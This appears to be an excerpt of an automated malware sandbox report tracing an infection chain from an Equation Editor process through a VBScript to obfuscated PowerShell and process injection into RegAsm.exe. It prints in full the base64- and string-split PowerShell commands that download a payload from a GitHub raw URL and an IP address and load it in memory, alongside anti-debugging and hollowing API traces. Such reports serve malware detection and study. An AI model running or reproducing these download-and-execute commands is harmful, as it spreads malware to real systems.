                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_0041A7D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 597489Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 641Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1719Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1522Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4231Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8207Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1673Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_19-53716
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3996Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep count: 1522 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2160Thread sleep count: 4231 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -597489s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2676Thread sleep count: 252 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2676Thread sleep time: -126000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2480Thread sleep count: 1219 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2480Thread sleep time: -3657000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3244Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2480Thread sleep count: 8207 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2480Thread sleep time: -24621000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2668Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407877 FindFirstFileW,FindNextFileW,19_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044E8F9 FindFirstFileExA,19_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,19_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_10006580 FindFirstFileExA,19_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,19_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00418981 memset,GetSystemInfo,20_2_00418981
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 597489Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,19_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00443355 mov eax, dword ptr fs:[00000030h]19_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_10004AB4 mov eax, dword ptr fs:[00000030h]19_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,19_2_00411D39
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00434BD8 SetUnhandledExceptionFilter,19_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_10002B1C

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,19_2_0041812A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe19_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419662 mouse_event,19_2_00419662
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wgfwwugimmoks"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\hispxnqjaugxdnkyl"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9dscrj3inkydsid0gjysnezj9jysnahr0cccrj3mnkyc6ly8nkydyyxcuzycrj2knkyd0ahunkydidxmnkydlcmnvjysnbnrlbicrj3qnkycujysnyycrj29tl05vrgv0zscrj2n0t24nkycvtm9ezxrly3qnkydpbi9yzwzzjysnl2hlywrzl21hascrj24vjysnrgv0yscrj2hojysnb3rolvyudccrj3gnkyd0ezinkyd9oyb7jysnmx1ijysnyscrj3nljysnnicrjzqnkyddbycrj24nkyd0zw50id0gjysnke5ldycrjy0nkydpyicrj2ply3qguycrj3knkydzjysndgvtlk5ldc5xzwjdbccrj2knkydlbnqplkqnkydvjysnd24nkydsb2fku3ryaw4nkydnkhsxfxvybcknkyc7ihsnkycxjysnfscrj2jpbicrj2fyeumnkydvbnrlbnqnkycgpsbbjysnu3knkydzdgvtjysnlicrj0mnkydvbnzlcnrdojpgcicrj28nkydtjysnqicrj2fzzty0jysnu3ryaw4nkydnkhsxfwjhc2u2nemnkydvbnqnkydlbnqpoycrjyankyd7mx1hc3nlbwjsesankyc9jysniccrj1tszwzszwmnkyd0jysnaw9ujysnlkfzc2vtjysnymx5xto6tg9hzccrjyh7jysnmscrj30nkydijysnaw5hcicrj3ldb250jysnzscrj24nkyd0jysnktsgwycrj2rubglijysnlicrj0lplkhvbwvdojpwqukoezb9dhgnkyd0llinkydfu1mnkydtrccrj1ivmdu0lzkundqumdqnkycyljgzjysnly86chr0jysnahsnkycwfscrjywnkycgezb9zgvzyxrpdmfkb3swfswgeycrjzb9zgvzjysnyxrpdmfkjysnb3swfswgeycrjzb9zgunkydzjysnyscrj3rpdicrj2fkb3swfswnkycgezb9umunkydnjysnqxntezb9lcankyd7mh17mh0nkycsezankyd9jysnezb9kscplwygiftjagfsxtm0lftjagfsxtm2lftjagfsxtm5ksb8ic4oicrtsevmtelkwzfdkyrtaevsbelkwzezxssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
